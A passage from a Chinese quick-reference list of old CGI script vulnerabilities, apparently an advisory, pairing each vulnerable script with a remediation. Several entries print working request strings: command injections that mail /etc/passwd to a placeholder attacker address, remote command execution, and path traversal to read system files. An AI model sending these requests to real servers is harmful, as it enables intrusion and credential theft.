[摘要]?data=DownloadHTTP/1.0 建议: 建议审核cgi-bin目录,避免有不必要的程序存在 解决方法: 删除handler文件 ____________________________... ?data=Download HTTP/1.0 建议: 建议审核cgi-bin目录,避免有不必要的程序存在 解决方法: 删除handler文件
________________________________________________________________
14 类型: 攻击型 名字: webgais 风险等级: 高 描述: /cgi-bin,目录下的webgais是GAIS搜索工具的一个接口,它有一个毛病使入侵者可以绕过程序的安全机制,执行系统命令: POST /cgi-bin/webgais HTTP/1.0 Content-length: 85 (replace this with the actual length of the "exploit" line) telnet target.machine.com 80
query=';mail+you\@your.host</etc/passwd;echo'&output=subject&domain=paragraph 建议: 建议审核cgi-bin目录,避免有不必要的程序存在 解决方法: 删除webgais文件
________________________________________________________________
15 类型: 攻击型 名字: websendmail 风险等级: 高 描述: /cgin-bin目录下的websendmail程序允许入侵者执行一个系统指令:
telnet target.machine.com 80 POST /cgi-bin/websendmail HTTP/1.0 Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90) receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a &content=a 建议: 建议审核cgi-bin目录,避免有不必要的程序存在 解决方法: 高级用户:编辑websendmail脚本,过滤特殊字符 一般用户:删除websendmail文件
____________________________________________________________________
16 类型: 攻击型 名字: webdist.cgi 风险等级: 高 描述: 对于Irix6.2和6.3平台,/cgi-bin目录下的webdist.cgi有一个弱点允许入侵者无须登录而在系统上执行任何指令: http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
建议: 建议审核cgi-bin目录,避免有不必要的程序存在 解决方法: 删除/var/www/cgi-bin/webdist.cgi目录下的webdist.cgi
__________________________________________________________________
17 类型: 攻击型 名字: faxsurvey 风险等级: 高 描述: 在Linux S.u.S.E上/cgi-bin目录下的faxsurvey程序允许入侵者无须登录就能在服务器执行指令: http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd 建议: 建议审核cgi-bin目录,避免有不必要的程序存在 解决方法: 删除/cgi-bin/faxsurvey文件
_______________________________________________________________________
18 类型: 攻击型 名字: htmlscript 风险等级: 中 描述: 安装了htmlscript2.99x或者更早版本的服务器,存在一个毛病使入侵者可以查看服务器上的任何文件: http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd 建议: 建议审核cgi-bin目录,避免有不必要的程序存在 解决方法: 删除/cgi-bin/htmlscript脚本文件,或者将htmlscript升级到3。0以上
__________________________________________________________________________
19 类型: 攻击型 名字: pfdisplay 风险等级: 中 描述: 在Irix6.4或者更早版本的web服务器上,/cgi-bin/pfdisplay程序允许入侵者非法查看服务器上的文件 建议: 建议审核cgi-bin目录,避免有不必要的程序存在 解决方法: 删除/cgi-bin/pfdisplay文件,或者打补丁 补丁可以去sgigate.sgi.com (204.94.209.1) 或者ftp.sgi.com下载: Filename: README.patch.3018 Algorithm #1 (sum -r): 37955 11 README.patch.3018 Algorithm #2 (sum): 15455 11 README.patch.3018 MD5 checksum: 1169EB51D75E0794C64C2C1FD6211B69
Filename: patchSG0003018 Algorithm #1 (sum -r): 01679 2 patchSG0003018 Algorithm #2 (sum): 12876 2 patchSG0003018 MD5 checksum: BD16A53A0AE693D6E9E276EE066BDBC8
Filename: patchSG0003018.idb Algorithm #1 (sum -r): 01339 2 patchSG0003018.idb Algorithm #2 (sum): 251 2 patchSG0003018.idb MD5 checksum: 1CB16E6A8C50BF17CD02A29C2E4D35EB
Filename: patchSG0003018.performer_tools_man Algorithm #1 (sum -r): 10201 8 patchSG0003018.performer_tools_man Algorithm #2 (sum): 3144 8 patchSG0003018.performer_tools_man MD5 checksum: B6B3D90FAB9B5A342397C3E5AF5A8D29
Filename: patchSG0003018.performer_tools_sw Algorithm #1 (sum -r): 48474 18 patchSG0003018.performer_tools_sw Algorithm #2 (sum): 28176 18 patchSG0003018.performer_tools_sw MD5 checksum: DF4E8ED8326A6A0B39F7B4D67E5FD71F 相关连接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
_____________________________________________________________________
20 类型: 攻击型 名字: www-sql 风险等级: 中 描述: www-sql存在于/cgi-bin/目录下,这将导致入侵可以越权访问被保护的文件 建议: 最好删除www-sql文件 解决方法: #if PHPFASTCGI while(FCGI_Accept() >= 0) { #endif s = getenv("REDIRECT_STATUS"); if(!s) { puts("Content-type: text/plain\r\n\r\nPHP/FI detected an internal error. Please inform sa@hogia.net of what you just did.\n"); exit(1); } s = getenv("PATH_TRANSLATED"); 相关连接:
_________________________________________________________________________________
21 类型: 攻击型 名字: view-source 风险等级: 高 描述: 在cgi-bin目录下的view-source程序没有对输入进行安全检查,使入侵者可以查看服务器上的任何文件 建议: 建议审核cgi-bin目录,避免有不必要的程序存在 解决方法: 删除/cgi-bin目录下的viewsource程序 相关连接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
______________________________________________________________________
22 类型: 攻击型 名字: campas 风险等级: 高 描述: 在cgi-bin目录下的campas程序有一个毛病可以使入侵者随意查看server上的重要文件: telnet www.xxxx.net 80 Trying 200.xx.xx.xx... Connected to venus.xxxx.net Escape character is '^]'. GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a 建议: 建议审核cgi-bin目录,避免有不必要的程序存在 解决方法: 删除/cgi-bin目录下的campas程序 相关连接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
___________________________________________________________________________
23 类型: 攻击型 名字: aglimpse 风险等级: 高 描述: 在cgi-bin目录下的aglimpse程序有一个毛病可以使入侵者无须登录而随意执行任何指令 建议: 建议审核cgi-bin目录,避免有不必要的程序存在 解决方法: 删除/cgi-bin目录下的aglimpse程序 相关连接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
______________________________________________________________________________
24 类型: 攻击型 名字: AT-admin.cgi 风险等级: 中 描述: 在Excite for Web Servers 1.1上的/cgi-bin/AT-admin.cgi程序,允许普通用户完全控制整个系统 建议: 建议审核cgi-bin目录,避免有不必要的程序存在 解决方法: 删除/cgi-bin目录下的AT-admin.cgi程序 相关连接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
____________________________________________________________________________________
25 类型: 攻击型 名字: finger 风险等级: 中 描述: 这个位于/cgi-bin下的finger程序,可以查看其它服务器的信息,但是如果将参数改成本机,本机上的帐号信息将暴露无遗: /cgi-bin/finger?@localhost 建议: 建议审核cgi-bin目录,避免有不必要的程序存在 解决方法: 删除/cgi-bin目录下的finger程序 相关连接:
________________________________________________________________________
|
关键词: CGI安全漏洞资料速查 v1.0(转一)